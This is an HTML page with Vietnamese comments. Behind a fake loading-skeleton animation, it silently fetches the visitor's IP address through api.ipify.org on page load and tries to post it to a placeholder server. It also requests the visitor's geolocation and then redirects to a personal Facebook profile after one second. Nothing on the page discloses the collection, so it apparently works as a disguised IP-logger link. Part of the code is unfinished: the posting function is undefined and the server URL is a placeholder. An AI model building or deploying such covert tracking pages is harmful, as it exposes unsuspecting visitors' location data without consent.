<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Geolocation Example</title>

<style>
   body {
  background: #ccc;
}
[class*="box-"] {
  height: 6px;
  width: 400px;
  background: #eee;
  margin-bottom: 13px;
  margin-right: 5px;
}

.box-loading {
  background: #fff;
  height: 100vh;
  width: 100%;
  margin: 0 auto;
  padding: 20px;
  display: block;
  box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  -o-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  border-radius: 3px;
  -o-border-radius: 3px;
  -moz-border-radius: 3px;
  -webkit-border-radius: 3px;
}

.box-thumbnail {
  height: 40px;
  width: 40px;
  float: left;
  margin-right: 10px;
}

.box-line-sm {
  width: 120px;
  margin-top: 10px;
  overflow: hidden;
}

.box-line-xs {
  width: 80px;
  overflow: hidden;
}

.box-line-df {
  margin-top: 30px;
  clear: both;
  width: 380px;
}

.box-line-lg {
  width: 200px;
}

.box-line-lgx {
  width: 450px;
}
[class*="box-line"],
.box-thumbnail {
  animation: timeline;
  animation-duration: 1.2s;
  animation-timing-function: linear;
  animation-iteration-count: infinite;
  background: linear-gradient(to right, #eeeeee 8%, #dddddd 18%, #eeeeee 33%);
  background-size: 800px auto;

}
@keyframes timeline {
  0% {
    background-position: -350px 0;
  }
  100% {
    background-position: 400px 0;
  }
}
</style>
</head>

<body>
    <div class="box-loading">
        <div class="box-thumbnail"></div>
 
        <div class="box-line-sm"></div>
        <div class="box-line-xs"></div>
 
        <div class="box-line-df"></div>
        <div class="box-line-lgx"></div>
        <div class="box-line-lg"></div>
    </div>

    <script>
        function getLocation() {
            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(showPosition, showError);
            } else {
                console.log("Geolocation is not supported by this browser.");
            }
        }

        function showPosition(position) {
            var latitude = position.coords.latitude;
            var longitude = position.coords.longitude;
            var locationString = "Vị trí của bạn: " + latitude + "," + longitude;
            console.log(locationString);
            console.log("Latitude: " + latitude + "\nLongitude: " + longitude);
        }

        function showError(error) {
            switch(error.code) {
                case error.PERMISSION_DENIED:
                    console.log("User denied the request for Geolocation.");
                    break;
                case error.POSITION_UNAVAILABLE:
                    console.log("Location information is unavailable.");
                    break;
                case error.TIMEOUT:
                    console.log("The request to get user location timed out.");
                    break;
                case error.UNKNOWN_ERROR:
                    console.log("An unknown error occurred.");
                    break;
            }
        }

        function redirectToFacebook() {
            window.location.href = "https://web.facebook.com/khanhduykhanh.4269?mibextid=LQQJ4d&_rdc=1&_rdr";
        }

        function getAndSaveIPAddress() {
            fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
                const ip = data.ip;
                console.log('Địa chỉ IP của bạn là:', ip);
                const apiURL = 'URL_CỦA_API_SPRING_BOOT';
                const postData = { ip: ip };
                sendPostRequest(apiURL, postData)
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Lỗi khi gửi địa chỉ IP lên máy chủ');
                    }
                    console.log('Đã gửi địa chỉ IP lên máy chủ');
                })
                .catch(error => console.error(error));
            })
            .catch(error => console.error('Lỗi khi lấy địa chỉ IP:', error));
        }

        // Gọi hàm lấy và gửi địa chỉ IP khi trang được tải
        getAndSaveIPAddress();
        getLocation();

        // Chuyển hướng sau 1 giây
        setTimeout(redirectToFacebook, 1000);
    </script>
</body>
</html>
